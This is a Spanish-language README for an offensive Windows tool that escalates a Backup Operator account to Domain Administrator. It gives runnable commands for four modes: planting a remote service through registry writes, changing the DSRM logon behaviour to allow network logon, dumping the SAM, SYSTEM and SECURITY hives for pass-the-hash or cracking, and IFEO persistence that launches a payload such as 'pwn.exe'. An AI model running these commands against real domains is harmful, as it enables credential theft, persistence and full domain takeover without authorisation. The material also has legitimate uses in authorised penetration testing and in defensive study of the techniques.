
Escalar de Operador de Copia de Seguridad a Administrador de Dominio utilizando cuatro técnicas: creación remota de servicios, manipulación del registro DSRM, volcado del hive SAM/SYSTEM y persistencia IFEO para movimiento lateral y escalada de privilegios.
El BackupOperatorToolkit (BOT) tiene 4 modos diferentes que permiten escalar de Operador de Respaldo a Administrador de Dominio.
Ejecute "runas.exe /netonly /user:domain.dk\backupoperator powershell.exe" antes de ejecutar la herramienta.
El modo SERVICIO crea un servicio en el host remoto que se ejecutará cuando el host se reinicie.
El servicio se crea modificando el registro remoto. Esto es posible pasando el valor "REG_OPTION_BACKUP_RESTORE" a RegOpenKeyExA y RegSetValueExA.
No es posible ejecutar el servicio inmediatamente, ya que la base de datos del administrador de control de servicios "SERVICES_ACTIVE_DATABASE" se carga en la memoria al arrancar y solo se puede modificar con privilegios de administrador local, que el operador de respaldo no tiene.
.\BackupOperatorToolkit.exe SERVICE \\PATH\To\Service.exe \\TARGET.DOMAIN.DK SERVICENAME DISPLAYNAME DESCRIPTION

El modo DSRM establecerá la clave de registro DsrmAdminLogonBehavior ubicada en "HKLM\SYSTEM\CURRENTCONTROLSET\CONTROL\LSA" en 0, 1 o 2.
Establecer el valor en 0 solo permitirá usar la cuenta DSRM cuando esté en modo de recuperación.
Establecer el valor en 1 permitirá usar la cuenta DSRM cuando el servicio de servicios de directorio esté detenido y el NTDS esté desbloqueado.
Establecer el valor en 2 permitirá usar la cuenta DSRM con autenticación de red como WinRM.
Si se ha usado el modo DUMP y la cuenta DSRM se ha descifrado sin conexión, establezca el valor en 2 e inicie sesión en el controlador de dominio con la cuenta DSRM, que será administrador local.
.\BackupOperatorToolkit.exe DSRM \\TARGET.DOMAIN.DK 0||1||2

El modo DUMP volcará las colmenas SAM, SYSTEM y SECURITY en una ruta local en el host remoto o subirá los archivos a un recurso compartido de red.
Una vez volcadas las colmenas, podría hacer PtH con el hash del controlador de dominio, descifrar DSRM y habilitar la autenticación de red, o posiblemente autenticarse con otra cuenta encontrada en los volcados. Es posible que en estos archivos se almacenen cuentas de otros bosques; no estoy seguro de por qué, pero esto se ha observado en compromisos con bosques de gestión.
Este modo está inspirado en el proyecto BackupOperatorToDA.
.\BackupOperatorToolkit.exe DUMP \\PATH\To\Dump \\TARGET.DOMAIN.DK

El modo IFEO (Opciones de ejecución de archivos de imagen) le permitirá ejecutar una aplicación cuando se termine un proceso específico.
Esto podría otorgar un shell antes que el modo SERVICIO en caso de que el host objetivo esté muy utilizado y rara vez se reinicie.
El ejecutable se ejecutará como hijo del proceso WerFault.exe.
.\BackupOperatorToolkit.exe IFEO notepad.exe \\Path\To\pwn.exe \\TARGET.DOMAIN.DK



